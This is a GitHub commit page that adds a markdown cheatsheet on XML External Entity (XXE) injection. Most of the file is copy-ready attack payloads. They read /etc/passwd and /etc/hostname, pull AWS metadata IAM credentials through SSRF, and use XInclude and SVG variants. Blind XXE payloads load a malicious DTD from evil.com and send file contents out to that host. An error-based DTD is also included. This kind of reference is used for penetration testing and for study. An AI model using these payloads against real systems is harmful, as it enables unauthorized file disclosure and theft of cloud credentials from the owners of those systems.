-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
81 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,81 @@ | ||
| --- | ||
| title: XXE Injection | ||
| description: XXE Injection cheatsheet | ||
| --- | ||
|
|
||
| # XXE Injection | ||
|
|
||
| XXE (XML External Entity) attacks are a type of injection attack in which an attacker attempts to exploit a vulnerability in an application that parses XML input. This vulnerability can allow an attacker to inject malicious code into the XML input, which is then executed by the application. | ||
|
|
||
| ## Attacks | ||
|
|
||
| ### Read files | ||
|
|
||
| ```xml | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> | ||
| <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> | ||
| ``` | ||
|
|
||
| ### SSRF | ||
|
|
||
| ```xml | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"> ]> | ||
| <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> | ||
| ``` | ||
|
|
||
| ### XML Parameter entities | ||
|
|
||
| ```xml | ||
| <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]> | ||
| ``` | ||
|
|
||
| ### XML Injection (not in DOCTYPE) | ||
|
|
||
| ```xml | ||
| <foo xmlns:xi="http://www.w3.org/2001/XInclude"> | ||
| <xi:include parse="text" href="file:///etc/passwd"/></foo> | ||
|
|
||
| # POST parameters example : | ||
| productId=<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>&storeId=1 | ||
| ``` | ||
|
|
||
| ### Exfil using SVG images | ||
|
|
||
| ```xml | ||
| <?xml version="1.0" standalone="yes"?> | ||
| <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> | ||
| <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> | ||
| <text font-size="16" x="0" y="16">&xxe;</text> | ||
| </svg> | ||
| ``` | ||
|
|
||
| ### Blind XXE - Exfil using DTD | ||
|
|
||
| Send to server : | ||
|
|
||
| ```xml | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://evil.com/exploit.dtd"> %xxe;]> | ||
| <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck> | ||
| ``` | ||
|
|
||
| Malicious DTD (text/xml) : | ||
|
|
||
|
|
||
| ```xml | ||
| <!ENTITY % file SYSTEM "file:///etc/hostname"> | ||
| <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'https://evil.com//?x=%file;'>"> | ||
| %eval; | ||
| %exfiltrate; | ||
| ``` | ||
|
|
||
| ### Error based DTD | ||
|
|
||
| ```xml | ||
| <!ENTITY % file SYSTEM "file:///etc/passwd"> | ||
| <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> | ||
| %eval; | ||
| %error; | ||
| ``` |